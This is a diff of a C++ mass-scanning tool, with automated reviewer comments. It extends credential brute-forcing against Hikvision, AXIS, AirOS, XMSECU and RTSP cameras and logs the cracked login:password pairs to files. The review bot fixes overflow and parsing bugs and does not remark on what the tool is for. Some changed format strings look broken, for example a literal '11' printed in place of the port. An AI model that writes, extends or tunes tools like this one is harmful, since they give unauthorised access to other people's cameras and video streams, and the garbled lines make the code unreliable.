+ sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE2 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str());
}
else if(flag == -22)
{
if(ftsSSH) ftsSSH = __checkFileExistence(flag);
- sprintf(fileName, "./result_files-%s/" TYPE5 ".html", Utils::getStartDate().c_str());
- file = fopen(fileName, "a");
+ sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE5 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str());
}
else if(flag == 3)
{
if(ftsFTP) ftsFTP = __checkFileExistence(flag);
- sprintf(fileName, "./result_files-%s/" TYPE4 ".html", Utils::getStartDate().c_str());
- file = fopen(fileName, "a");
+ sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE4 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str());
}
else if(flag >= 17 || flag == 11 || flag == 12
|| flag == 13 || flag == 14 || flag == 2
)
{
if(ftsBA) ftsBA = __checkFileExistence(flag);
- sprintf(fileName, "./result_files-%s/" TYPE3 ".html", Utils::getStartDate().c_str());
- file = fopen(fileName, "a");
+ sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE3 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str());
}
else stt->doEmitionRedFoundData("Unknown flag [FLAG: " + QString::number(flag) + "]");
+ FILE *file = fopen(fileName, "a");
+
if(file != NULL)
{
time_t rtime;
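Review bot: Moving `fopen` below the chain means it now also runs in the unknown-flag branch, where `fileName` is still the empty string, so the code depends on `fopen("", "a")` failing. Add `return;` after the `doEmitionRedFoundData("Unknown flag ...")` call, or test `fileName[0] != '\0'` before opening. The rest of fputsf is outside this hunk.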
@@ -874,7 +878,7 @@ void _specFillerCustom(const char *ip, int port, const char *finalstr, const cha
if (strlen(login) > 0 || strlen(pass) > 0)
{
- sprintf(log, "%s:%s (%s:%s) T: %s\n",
+ sprintf(log, "%s: %s (%s:%s) T: %s\n",
classString, ip, ip, login, pass, finalstr);
}
@@ -911,20 +915,20 @@ void _specFillerBA(const char *ip, int port, const char *finalstr, const char *l
if (strlen(login) > 0 || strlen(pass) > 0)
{
if (8 == offset) {
- sprintf(log, "[BA]:%s:%s@%s T: %s\n",
+ sprintf(log, "[BA]: %s:%s@%s T: %s\n",
login, pass, ip + offset, login, pass, ip + offset, finalstr);
}
else {
- sprintf(log, "[BA]:%s:%s@%s T: %s\n",
+ sprintf(log, "[BA]: %s:%s@%s T: %s\n",
login, pass, ip + offset, login, pass, ip + offset, finalstr);
}
} else {
if (8 == offset) {
- sprintf(log, "[BA]:%s T: %s\n",
+ sprintf(log, "[BA]: %s T: %s\n",
ip + offset, ip + offset, finalstr);
}
else {
- sprintf(log, "[BA]:%s T: %s\n",
+ sprintf(log, "[BA]: %s T: %s\n",
ip + offset, ip + offset, finalstr);
}
}
@@ -942,15 +946,15 @@ void _specFillerRSTP(const char *ip, int port, const char *finalstr, const char
if (strlen(login) > 0 || strlen(pass) > 0)
{
- sprintf(log, "[RSTP]:%s:%d (%s:%s) T: %s\n",
- ip, port, login, pass, finalstr);
+ sprintf(log, "[RSTP]: %s11 (%s:%s) T: %s\n",
+ ip, ip, login, pass, finalstr);
}
else {
- sprintf(log, "[RSTP]:%s:%d T: %s\n",
- ip, port, finalstr);
+ sprintf(log, "[RSTP]: %s11 T: %s\n",
+ ip, ip, finalstr);
}
- stt->doEmitionFoundDataCustom(QString::fromLocal8Bit(log), "FF69B4");
+ stt->doEmitionFoundDataCustom(QString::fromLocal8Bit(log), "3090C7");
fputsf(log, flag);
}
@@ -1384,10 +1388,12 @@ int _specRTSPBrute(const char *ip, int port,
return -1;
}
- if (strstr(lps.login, "UNKNOWN") == NULL && strlen(lps.other) == 0)
+ if (strstr(lps.login, "UNKNOWN") == NULL)
{
- _specFillerRSTP(ip, port, finalstr, lps.login, lps.pass, flag);
- fillGlobalLogData(ip, port, std::to_string(size).c_str(), finalstr, lps.login, lps.pass, "", cp, "RTSP");
+ char title[512] = { 0 };
+ sprintf(title, "%s %s", lps.other, finalstr);
+ _specFillerRSTP(ip, port, title, lps.login, lps.pass, flag);
+ //fillGlobalLogData(ip, port, std::to_string(size).c_str(), finalstr, lps.login, lps.pass, "", cp, "RTSP");
};
}
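Review bot: `sprintf(title, "%s %s", lps.other, finalstr)` copies two strings of unchecked length into `title[512]`; judging by the `parseFlag` call site, `finalstr` carries header text taken from the probed host's response, so its length should be treated as untrusted. Use `snprintf(title, sizeof(title), "%s %s", lps.other, finalstr);`. The same applies to `ipNew[256]` and `newIP[128]` in the `parseFlag` hunks further down, where the removed commented-out code at least capped the copy with `strncat(newIP, ipRaw, 96)`. The `fillGlobalLogData` call should be deleted rather than commented out if it is no longer wanted.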
@@ -2677,7 +2683,7 @@ std::string equivRedirectHandler(std::string *buff, char* ip, int port, Lexems *
int portPos = location.find(":", 7);
if (-1 != portPos) {
- int portPosEnd = location.find("/ \n>\"'", portPos);
+ int portPosEnd = location.find_first_of("/ \n>\"'", portPos);
if (-1 != portPosEnd) {
newPort = std::stoi(location.substr(portPos + 1, portPosEnd));
if (gDebugMode) {
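Review bot: `location.substr(portPos + 1, portPosEnd)` passes an end position where `substr` expects a length, and `std::stoi` throws `std::invalid_argument` or `std::out_of_range` when the text after the colon is not a usable number; `location` presumably comes from the response being parsed, and no handler is visible in this hunk. Use `location.substr(portPos + 1, portPosEnd - portPos - 1)`, wrap the conversion in a `try`/`catch` that leaves `newPort` unchanged, and reject values outside 1–65535. `portPos` and `portPosEnd` would also be better as `std::size_t` compared against `std::string::npos`. The function continues on both sides of this hunk.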
@@ -2898,6 +2904,9 @@ std::string getHeader(const std::string *buffcpy, const int flag) {
return "[IOmega NAS]";
}
}
+ else if (STRSTR(buffcpy, "x-rtsp-tunnelled") != -1 || STRSTR(buffcpy, "rtsp://") != -1) {
+ return "[RTSP]";
+ }
else {
std::string tempBuff = buffcpy->c_str();
const std::string &result_ref = getTitle(tempBuff.c_str(), flag);
@@ -3013,7 +3022,7 @@ void parseFlag(int flag, char* ip, char *ipRaw, int port, std::string *buff, con
HikVis::hikCounter = 0;
HikVis::hikPart++;
}
- sprintf(fileName, "./result_files-%s/hikkafile_%s_part_%d.csv", date, date, HikVis::hikPart);
+ sprintf(fileName, "./" DIR_NAME "%s_%s/hikkafile_%s_part_%d.csv", date, Utils::getCurrentTarget().c_str(), date, HikVis::hikPart);
FILE *f = fopen(fileName, "a");
if (f != NULL) {
char string[1024] = { 0 };
@@ -3047,8 +3056,8 @@ void parseFlag(int flag, char* ip, char *ipRaw, int port, std::string *buff, con
HikVis::rviCounter = 0;
HikVis::rviPart++;
}
- sprintf(fileName, "./result_files-%s/rvifile_%s(%s)_part_%d.xml",
- date, date, Utils::getStartTime().c_str(), HikVis::rviPart);
+ sprintf(fileName, "./" DIR_NAME "%s_%s/rvifile_%s(%s)_part_%d.xml",
+ date, Utils::getCurrentTarget().c_str(), date, Utils::getStartTime().c_str(), HikVis::rviPart);
char string[1024] = { 0 };
FILE *fc = fopen(fileName, "r");
@@ -3132,8 +3141,15 @@ void parseFlag(int flag, char* ip, char *ipRaw, int port, std::string *buff, con
}
else if (flag == 34) //Hikvision ip cam
{
- if (_specBrute(ip, port, "[Hikvision] IP Camera", flag, "/PSIA/Custom/SelfExt/userCheck", "[DIGEST]", cp, size) == -1){
- _specBrute(ip, port, "[Hikvision] IP Camera", flag, "/PSIA/Custom/HIK/userCheck", "[DIGEST]", cp, size);
+ char ipNew[256] = { 0 };
+ if (strstri(ip, "https://") != NULL) {
+ sprintf(ipNew, "https://%s", ipRaw);
+ }
+ else {
+ sprintf(ipNew, "http://%s", ipRaw);
+ }
+ if (_specBrute(ipNew, port, "[Hikvision] IP Camera", flag, "/PSIA/Custom/SelfExt/userCheck", "[DIGEST]", cp, size) == -1){
+ _specBrute(ipNew, port, "[Hikvision] IP Camera", flag, "/PSIA/Custom/HIK/userCheck", "[DIGEST]", cp, size);
}
}
else if (flag == 35) //EasyCam
@@ -3269,11 +3285,9 @@ void parseFlag(int flag, char* ip, char *ipRaw, int port, std::string *buff, con
}
else if (flag == 59) //RTSP
{
- //char newIP[128] = {0};
- //strcpy(newIP, "rtsp://");
- //strncat(newIP, ipRaw, 96);
- //strcat(newIP, "/");
- _specRTSPBrute(ipRaw, port, header.c_str(), flag, "RTSP", cp, size);
+ char newIP[128] = {0};
+ sprintf(newIP, "rtsp://%s:%d/", ipRaw, port);
+ _specRTSPBrute(newIP, port, header.c_str(), flag, "RTSP", cp, size);
}
else if (flag == 60) //ACTi
{
@@ -3283,7 +3297,11 @@ void parseFlag(int flag, char* ip, char *ipRaw, int port, std::string *buff, con
{
_specWEBIPCAMBrute(ip, port, "[AirOS] WEB IP Camera", flag, "WEB Authorization", cp, size, "AirOS", &cookie);
}
-
+ else if (flag == 62) //XMSECU
+ {
+ _specWEBIPCAMBrute(ip, port, "[XMSECU] WEB IP Camera", flag, "WEB Authorization", cp, size, "XMSECU", &cookie);
+ }
+
else if (flag == 20) //AXIS Camera
{
if (_specBrute(ip, port, "AXIS Camera", flag, "/mjpg/video.mjpg", "Basic Authorization", cp, size) == -1) {
@@ -3359,19 +3377,26 @@ std::string handleRedirects(std::string *buffcpy, char* ip, int port) {
counter.iterationCount = 0;
std::string location = std::string(ip);
const std::string &locationEquiv = equivRedirectHandler(buffcpy, ip, port, &counter);
- location += locationEquiv;
+ if (locationEquiv.find("http") == 0) {
+ location = locationEquiv;
+ }
+ else {
+ location += locationEquiv;
+ }
counter.iterationCount = 0;
if (Utils::ustrstr((const std::string *) buffcpy, "